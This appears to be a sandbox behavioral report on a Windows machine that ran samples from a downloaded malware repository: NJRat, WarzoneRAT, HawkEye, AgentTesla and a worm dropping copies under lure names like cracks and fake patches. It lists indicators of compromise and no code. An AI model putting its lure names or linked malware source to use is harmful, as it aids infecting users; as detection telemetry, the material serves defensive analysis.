File created	C:\Users\Admin\Documents\Spybot - Search & Destroy .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Goodtool.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Alcohol120-Install.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\command.com\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\SnagIt .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\mantas.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\lesbian.scr\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\FruityLoops Setup.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Msn Hack.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\DVD Ripper.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Trillian .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Download Accelerator Plus.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\gba-renamer.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\ftp.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Norton Antivirus Crack.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Xeon XBOX Emulator.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\password.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Doom-Install.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Legend of Zelda.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\ICQ Pro 2003a beta .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Grokster.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Nero Burning ROM.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Visual Boy Advance .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\MSBlaster Patch.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\nocd crack.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Brittney Spears.scr\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\WS_FTP LE (32-bit) .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Microsoft Patch.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\quake3.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\aimbot.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\winamp.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\explorer.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\password dumper.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Kazaa 2.05 beta .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Windows XP Service Pack Cracked.exe\:Zone.Identifier:$DATA	Mantas.exe
File opened for modification	C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\Documents\crack.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\DoomII-Install.exe\:Zone.Identifier:$DATA	Mantas.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exeNJRat.exe

pid	process
4604	msedge.exe
4604	msedge.exe
4728	msedge.exe
4728	msedge.exe
2240	msedge.exe
2240	msedge.exe
5412	identity_helper.exe
5412	identity_helper.exe
2744	msedge.exe
2744	msedge.exe
3596	msedge.exe
3596	msedge.exe
3596	msedge.exe
3596	msedge.exe
1904	msedge.exe
1904	msedge.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe
4656	NJRat.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

NJRat.exe

pid process

4656 NJRat.exe

pid	process
4656	NJRat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

msedge.exe

pid	process
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

unregmp2.exewmplayer.exeNJRat.exeWarzoneRAT.exeAUDIODG.EXEHawkEye.exe

description	pid	process
Token: SeShutdownPrivilege	1396	unregmp2.exe
Token: SeCreatePagefilePrivilege	1396	unregmp2.exe
Token: SeShutdownPrivilege	1584	wmplayer.exe
Token: SeCreatePagefilePrivilege	1584	wmplayer.exe
Token: SeDebugPrivilege	4656	NJRat.exe
Token: SeDebugPrivilege	3896	WarzoneRAT.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	6204	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	6204	AUDIODG.EXE
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: SeDebugPrivilege	6352	HawkEye.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe
Token: SeIncBasePriorityPrivilege	4656	NJRat.exe
Token: 33	4656	NJRat.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe

Suspicious use of SendNotifyMessage 46 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4728	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Amus.exeMari.exeMiniSearchHost.exeAgentTesla.exe

pid process

6816 Amus.exe
1600 Mari.exe
6156 MiniSearchHost.exe
1584 AgentTesla.exe

pid	process
6816	Amus.exe
1600	Mari.exe
6156	MiniSearchHost.exe
1584	AgentTesla.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4728 wrote to memory of 3452	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 3452	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1264	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 4604	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 4604	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe
PID 4728 wrote to memory of 1316	4728	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://sites.google.com/view/thebest1ds
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
  2⤵
  PID:3452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
  2⤵
  PID:1264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
  2⤵
  PID:1316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:1172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
  2⤵
  PID:5708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:5176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6028 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:3040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
  2⤵
  PID:1660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
  2⤵
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2724 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
  2⤵
  PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7152 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
